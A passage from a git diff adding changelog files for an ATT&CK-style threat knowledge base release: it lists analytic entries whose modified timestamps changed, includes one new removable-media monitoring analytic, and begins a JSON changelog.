16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1812] Analytic 1812</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-06 19:21:56.951000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1815] Analytic 1815</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:30:28.435000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1816] Analytic 1816</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-18 16:14:55.614000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1817] Analytic 1817</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-18 16:25:11.215000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1820] Analytic 1820</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-24 17:35:08.607000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1821] Analytic 1821</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-24 17:34:54.559000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1822] Analytic 1822</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 17:53:31.236000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1823] Analytic 1823</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 23:48:31.416000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.384000+00:00</td></tr></tbody></table></details><hr><h4>[AN1824] Analytic 1824</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-16 15:56:09.700000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1825] Analytic 1825</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 18:28:31.071000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1826] Analytic 1826</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 18:41:55.176000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1827] Analytic 1827</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-19 17:21:51.812000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1828] Analytic 1828</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-19 19:41:30.977000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1829] Analytic 1829</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 17:06:45.192000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr></tbody></table></details><hr><h4>[AN1830] Analytic 1830</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 17:09:39.997000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1837] Analytic 1837</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 21:18:39.945000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.384000+00:00</td></tr></tbody></table></details><hr><h4>[AN1840] Analytic 1840</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-08 20:08:28.641000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1841] Analytic 1841</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-08 20:07:42.093000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1842] Analytic 1842</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:30:29.495000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1847] Analytic 1847</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 16:13:11.156000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1848] Analytic 1848</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 15:57:30.214000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1849] Analytic 1849</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 16:02:15.040000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1850] Analytic 1850</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 19:56:13.060000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1851] Analytic 1851</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-16 16:27:24.678000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1852] Analytic 1852</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 17:05:14.514000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1853] Analytic 1853</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-17 15:44:07.335000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1854] Analytic 1854</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-17 17:55:46.302000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details></details><h3>ics-attack</h3><details><summary>New Analytics</summary><hr><h4>[AN2066] Analytic 2066</h4><p><b>Current version</b>: 1.0</p><p><b>Description</b>: <p>Monitor for newly constructed drive letters or mount points to removable media. Monitor for newly executed processes that execute from removable media after it is mounted or when initiated by a user.</p></p></details><details><summary>Patches</summary><hr><h4>[AN1864] Analytic 1864</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:55.812000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1922] Analytic 1922</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:58.916000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN2045] Analytic 2045</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:56.808000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN2046] Analytic 2046</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:34:00.942000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN2047] Analytic 2047</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:34:04.333000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.384000+00:00</td></tr></tbody></table></details><hr><h4>[AN2048] Analytic 2048</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:52.442000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr></tbody></table></details><hr><h4>[AN2049] Analytic 2049</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:57.629000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN2050] Analytic 2050</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:56.263000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN2051] Analytic 2051</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:34:03.863000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.384000+00:00</td></tr></tbody></table></details><hr><h4>[AN2052] Analytic 2052</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:57.256000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN2053] Analytic 2053</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:55.408000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN2054] Analytic 2054</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:34:02.593000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN2055] Analytic 2055</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:52.139000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr></tbody></table></details><hr><h4>[AN2056] Analytic 2056</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:34:02.964000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN2057] Analytic 2057</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:55.025000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN2058] Analytic 2058</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:53.216000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details></details>
+            </body>
+        </html>
+        
\ No newline at end of file
diff --git a/modules/resources/docs/changelogs/v19.0-v19.1/changelog.json b/modules/resources/docs/changelogs/v19.0-v19.1/changelog.json
new file mode 100644
index 00000000000..672912f1832
--- /dev/null
+++ b/modules/resources/docs/changelogs/v19.0-v19.1/changelog.json
@@ -0,0 +1,127434 @@
+{
+    "enterprise-attack": {
+        "techniques": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-30 13:58:14.373000+00:00",
+                    "modified": "2026-05-12 15:12:00.639000+00:00",
+                    "name": "Abuse Elevation Control Mechanism",
